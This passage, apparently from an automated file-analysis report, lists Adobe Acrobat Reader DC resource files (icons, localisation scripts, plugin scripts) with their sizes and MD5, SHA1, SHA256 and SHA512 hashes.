                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  425aa9756e938cfa777222b52fa0b4b0973b89d2a58f376b39c2e804a1114990d7c0ebf890bdc398a72f05cdb6f441ec1d318e1215fe1c930451372100492287

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder-default.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  107e3c07311907faba4924a763c3318a

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b86d189a9dd395b8c571e5a20f6abfd0df4b706d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e3b6d3e489535722bfa5a3738dbb2c56e54726237735f8731ab3d7b79b696d22

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6c66be3bf7ab0f719500d97ac91fd7dbb0b199f50c9bc3a72de0c3449214c7691c9cc3a72abaebf89e287e73c15d0a96ad86d3c3ebab13d7d5e48d5b8d99ab95

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nextarrow_default.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9e62b30c3e9df491a8a711b63985560f

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  e6d0f7539cfcc653efa5d898dd275bb9b4f1fbfa

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  383c77c5073de8df65ff5484501f2394f664ddfea43a55e20c48ff6683cf2d6a

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  aa7b6b69994da424ae56926a78104dab365b3c9b49577579fbd177e558d4d14e63458125c29988d29fe1557c5a6ac3ddc4082f137a4af888f502cd7db1e3695a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f37316b35b7f152f25ae9b2c0b29dc4e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  daaa8267a8a426f8c7014380be39ec9c1b7cce47

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  85ab70dec2b359a37d165d8ecc8a91affc7c74bb54cb029bb6bf2662b1533b5b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  a7461884879dfe2ae5350771f28b17ec86aa16e83229f8068c9993c1c9fcd005b0f8ed5d435d0657c0d2118e6949d7ef4a07aff506faeb19f6142d157e510251

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_rename_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9842429c48d5840c0b8482150c80a8c3

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3ebdfb8e029839960c3de1fecb0f42fdbd752a3b

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e88b38ad381ee7680f8f74af1c5f60f08ff6501e0c00b1313920341cb64511d6

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6d686646f02f4ae11da6bb2b8506e7d3ffdaf40b9b9025df60b1c00cea558fbc62b66fcb164fd64b426626724591129d5e2491db94938aa8b82ae9c53569f4ec

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforsignature_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2b40effe24d144fc0ce97f1f70dba2aa

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  cb7f0fa496b9ecbb98b6f6fc7b0ad4757297e02c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  978ec4f6fa6ff7f221f09aa9b4a784a208bd0cad7f13a2c810ccc52d6fe24488

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  724cf7031e273b402fb6578edd3c4028d88c802f55a9889547159d9b19b590c7818ff96c36e4718d79d920ed49e942e977ff0f94f163c8968286ea14a7d1f23c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_share_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  1aa4ceb56332354405b2ceea1b675262

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b85deaf58f68521aabe7a3a4e325e00909cc072e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  49f10cce6e1a5e68605b7d5acdfce61f450ebf2095395af36d44f3b23c856a65

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  33a2e23f0bf22f1e79d0fafe4fc232636ba842fb7926e27d8a738578e00622a470c64a17781e1dbc5c0fe25a45a8f3922bd486cf4c7d6e3816e9e10c61ad886b

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d2c51271511a6f229be68bcf2dddb0f1

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  cf5232fa3e69e10c956e17e3def1a18a67fc3173

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  29220670a176ba45649f66246372e9f51b74e6ad0747e5d47a47247c5dbeefd2

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c85f9fccb0767b934bdb2fe43bf7e8281b65e5a49453c09837cc58533d37aa9836e42030a45aad29aa7febd9dc5b19cf421a44b0cdea5c65bb3db6ab41e2fb31

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f3d657b3850574b1d64b6b245947eea1

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  e7fe65037052e6209d10d9776d2592856ae27cb6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  32c0afc6a911d6b4da9388b39461af17313335f7995187a5826f473343eb712d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  2f1a39ca7370e2f3dae7fe778aee010fa745e011f21620d62c30f7b3edc684143c4288cd5316c49e4f0d58352f162fcb77c767fbbf5eda7dcd34a82daac970ca

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a8ae072753aa8ff1dc19a7aa3b9f83ce

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3c348c80703c97254d79fdccbc22fea457ce2f2e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  238528ee04221b6cff2474c6306cdab9779b1942497c9ef332d15a060dc86887

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  332af6f9b219f90236c979a28b7f6cfc9f757a2540ee52a6cae10b73bd642c4f16a3dee9c9f782f5fac2612502929d57f553d12ec5d2efcb0db39ce66040ea47

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  28KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0054de9be721011a4cf7a65b0bfe48d1

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1e3b6ab22407869672885f183c7e2b05176aa124

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  aa11c127687c7f8618de8a4a980f0d6f7c5bbe9b03211e662951481f7d6f26c7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  340deb8ef1fe99ec3d96bd22b55e18474cccde77bb7af27b066a484dd3a9efb18e928f42376ee26914a1cba678727d5e7d0c16d0a50556d1cbcad102c02bfe2e

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  5565d675f9f1699c62245a3563c05757

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ceeed296db0826392684fa26d966d523851238c1

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7ad660593483d506c8cbf978dd03cc201bd413326e5ad00b17eb058c853071ab

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  da5e7b3380cabb3154fb7c58b29c19dbb3d8cb137f045d101227c7529f5d05d79b140f2b52f4380a1846787317ca3dfd00911397c5eccd17aae00e61220cf11a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d5ca4d79a19c390df8f46ff4c6cb023f

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  9f9b5da7e4b0dad27dbd0d464ebd93e12b30ba73

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  791fdf4b8219178c761d221800f9355b9361601b9ec8e7483fa7a12e1e1b7e1a

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  e98ef3965a4ed9ad2fdd5e18dc9769ca305fd95d92dfb41ab312cb08501e1e286221237ccdb522ad6768146376ff52211177ce6ab1130749a53017ff6daefadf

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2b7db62de725754ae83224b324f78f00

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  9f6b112f90be6132d400082ba8927e9b94a35676

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  67d16392b74adc496b5d80937416a4b7ea231cbe683fae3c398bd260416f8a26

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1f54a63ae2a07ef6eb2da632a120fd469b490920a9d94add2ede720f17037e65d8a58ae322081253388794f93ad374053ef99b3b3ec8a3f151a1dc357e7ce07a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  97f4ecc9a93204ae8a0449e97c886b46

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  53ed1a487a2efe9ebd43d032938ad1968695452a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  13e2f530c310acfed630b374f01fb93c269550d4e9f9f42841f0231d08138bb2

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  77750f47a054ff8e3e28a7505669b9a91f338bfe59b3f37ecc60cfa4831b46d0f143afd1ad845a82563174030b3ed5b6705ad3486b872e701a5326b01cf6a723

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-selector.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  174KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7d3f0c581386d1a441ee157045d336aa

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  248396ef2c059e3d39ef31fd4a8b6f0c3b2e960f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  88231c1597bb6b3ef30303e7c20b9dd1e0cb44fd27295b7a5f991199955f3bce

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  330f53f3e68615116d6570fc10d23e0437e0753a791efb0a4485948ab09026e3a657fafa0c287acedb267c719b1bb5d62b74bfb3404e517c7de1b8d7dfb986f9

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-tool-view.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  374KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9bb909fa59eed5ff4cb51cb4b685c846

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1ea46b4bb29d21e91cd0bbba94aafad69a540d9d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8b2530b81c558e96c9f6a797e8d5361a1ea00e427a74570ec5267a8297938183

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  07f1791967490eec488a95b2a508ffe260195f9a75798df1a5bf6d702d2738824cdcbea824ef67f6cb166b5731d5e2c0bb29c25c8944d8039f54a0b61b8e69ad

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b2750d88ea60d75312af274f8bb9e909

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a5c1d8ae85aa555618351e8691e06b6ad08247e7

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  59f8f8860e9c3092120da7d4b9f19041dd6acc8e2cb93e51ad50848bd1c9791c

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  7237c2901caf3df44c40daff3ea7291655dfe0b23f23c538c981186714a70666c0d563fe7286046ae63c60217a38e7fa60573adc05e8b30b2c8efc8d4c9624fb

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  1647b008f6fd241f4f019c6e111ba4d8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  5bac2d84e63e4d55a52846d2b4b77a3b3c3f54c0

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1a678447faec04f0ec01afe990fbafb6756010fb60856fffe47ab96259a507f7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9e8ba921e8c0787ba47bf2b5f6607cacb954066a4cb645fd0ecf690dcd0b06b3e597a3056b4b8c528ddf779d3fec7d28e79d0043b14c3e31c5b04095bf9bf4f2

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  966B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  71df9a3001522c6c5b50c87adc3ae4db

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2d0bd355cf2ffb6603c049ae5c00c21e80daba27

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e298b6f3bf287e9f557f4c01e6f4dad921fc3786ae4cf02c9e7118148135eb7b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  31177af545346c93dacf619e948a31b9d16c2fc55d56cf32218dbb7c897f864b9e83769f40440c6d84e7040d01dfe72c2eca5efb552b00fa6cb3625fddf3c720

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  95298f25e408a49afe26b358a407f038

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  34c093891eeb19c8e1ec34ef528eef409ec560d2

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  3f5b59afbcbb3f59fed979aefee9e3181bf942ac902c784bebaf893860e1b632

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  60f38351a7035f038ad7ef51aa8a6e397e622ffa031d896112fd9d25b5f093bd86fa442f258d032cb0932419e3d04a4aea0b543d347ae893e3683b2ec88feddd

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  909B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  5e0753c0c298b02d7205c5c612b722e5

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  19e5dcca433768b8cbc5e80f6c30e943ee5bf823

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  fbe3459cf428c9c249e025872b6f37dc82a4f69d15faaffcd8de101e345c5282

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  dab8d7ffb13e933eb6f87612d22085ad756f0954c4127be89318af503ef18714b7c3477d630f5191c9e81d6b640a7b0f60797f4075da7ca67e3bb0dca2a6c261

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  374b1a43b551b7129f5ff97b5954fdf5

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7ded2465b3423c61f521334064ebd7db4f27b4e8

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  980d445810e3242a9e188efd0ffa3b9c3ed7e33cc9e3ecba74777bd56d5de5f1

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ebc8fefd9242749505062a6f78aee682b72239372155cc5aa191f4bd2d27667430d51f9f4815b95e1ee504e00e50126125da9853e3b57a1b8a56c10e2b2c3ea4

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b9b9edd2a3b2ce4c8b00aaefa7974c1e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  8b3f31c14731094bcebbe4982a0ca998880a8735

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  cbc6ef19859d55a23861180f45143843629ceac359ee33dd369dce0f5b6b7280

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d04bcfb887699848618bfa32e13ec3033402ac253c3d0e68b7925f9f3e135ac0a07f6d2a25957dcad8a7c1e12851a2b56cb9d98bec0176b4dc77d809e88c4b6d

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b31a3aee040f5501f54c453fddf295fe

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  4b16ae59d10e5d57e1227724351bb8fd78cce07d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2622babfb87e09a0e4f312897ab7c6b1fd6e2676391a4a14a06edaff2bb884a1

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9274d53af6c7ab1790a22c74011b97cc7f9732d3eb2a37350d67e23961467192f0496fd1cf28593be341ea5b79a2f78e4a02cde16e7dabcba40381b219a6ba79

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  909B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  30cf7fbe18687e1a760f20dd07c35aa4

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  6db398a2bab0754cdc16aeda1db9eeb5f5d2b2d2

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  71a48ab9e77d91fc3e92c814099195937a97767b5eca70a048d17d569ac6b5d5

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  a59f81a0383162acf0b31a0e42686a5e1622a389ba7ce4d853b66d5ff9d4d265632012d96b40e1fa68be5f5f1153b51a4b527d9fa11a289538c64e78e6446f47

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2876c86ddb0e4c72bf0c30e8fb4a5917

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7becb1633fbf09e248cab22f9483242c98bd054d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d11316368c24cf6dc3f8ca588b0486305e0626058e716386e3fa04c4dad95365

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  66b58686a99c257bf12ba82b085c1f339b5c9f7065cb943a97b0fe288160e240abf21c055151e46bfc143511b62352d947486ad5cc7cb03edddb6fc3a1f70f6d

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  909B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4e668962b7ff8ee55d6b3f0f224f160d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  490c6b0927b46ff02675085ff67e8dd7ef2b64f2

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6bf1e956f6fe724ee94a88c96414e4dbce06527b6cff9116f9c634319d615419

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f3abfc1c228592a0ee2faebc92f1f9530cff47a174b072d35a48bdbb2134428bd8b625f6b24dd5d648cb1f242f31e7cdb3756e7d68b6359aa471fefe71a86622

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7916fae1eab4fdfe04482816ca945c4b

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f38e0753bf22583e7c93c87041d918a1be963020

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  5088277df4324d06557f470b5f4f20ebfec301f0dceff05c747790b55e76f557

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  eefd90a9e075b58a76f5f7b6cea062a5b740d2893cab876280c2cc22bbdf1eb3a85c786b52d60f02b3bb6f08320d1afaf329383edbf571761a0a89275950a27c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  1411f713d39ca902bbb27a09fbe2a859

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f6f34496f14f08a68b2132a751397ce904c3178f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4b1263ac9c12d5c7bcc686261bdf3e873dd39fa1e2b88012de4196214d88d92b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  737ee6e6607d8da702c4e87a5aa4bbdc9f5f9c2d9907ae3a21e3060e3cafab02e8332bae7d706552b1ba190cd9824224bdb32b4054b4f027b7012a84e3e1b5fd

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  3401c94f9ceedbb6e79e3520175cabae

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  54baccb19adcd14945a8ff03df7fefa435f90d0a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1a08dd8a0aacfa838954de9e65d028d9ad24771b02470c8a196207c16101e22e

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  24fab06d585b23282b9905447dfb4e8e3d1211f0c3c7b48ca77cb127a5bda492adaeba5dcdb1fd05e2c0cde3916b029d99b11da5b704a4e0c74c7548c43c76d9

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_selected_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  239cd3acf3015815f96faad81af3c1bb

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2147fef5edc44d176a20cc0bd5876e763b34b6b5

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a9693b34d0bc437f4228e360919ed80daede8507cfcb4a6df028699bacf35bae

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b11ee3f92b14442fc5e75f0e2e163107e79421600d5c259e0f0dc86529cf283b6f50e4843dcc078574103f6856aa298da0ef9541d7e266542173ce5258405101

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_unselected_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  dd64ac7ad55cf472ef5f09a3c0648046

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1c150b65c88abdadf1e8b7cdb3e571a8cd292506

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  870ea2f6e44030b1f02e4cbc718b08630ea4b6467a1fc8b1ef3cf188866058c4

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c7105a73c76bc6efc344f4c7490a7329a78b8a396557eb109a645e93ba6227382b0439af8ec6cf22501bf75f8ccf40e15e823b9119fc0c298e410d519ef252f5

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  9KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7e79b86fe86d423134c3c858de6d80d2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  52881a8c287d84f588a738d8e58d025d7a428163

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  42581089142ad680fdee9b9065f7d450081dec5d01e996cc1056eebe017df167

                                                                                                                                                                                                                                                  SHA512

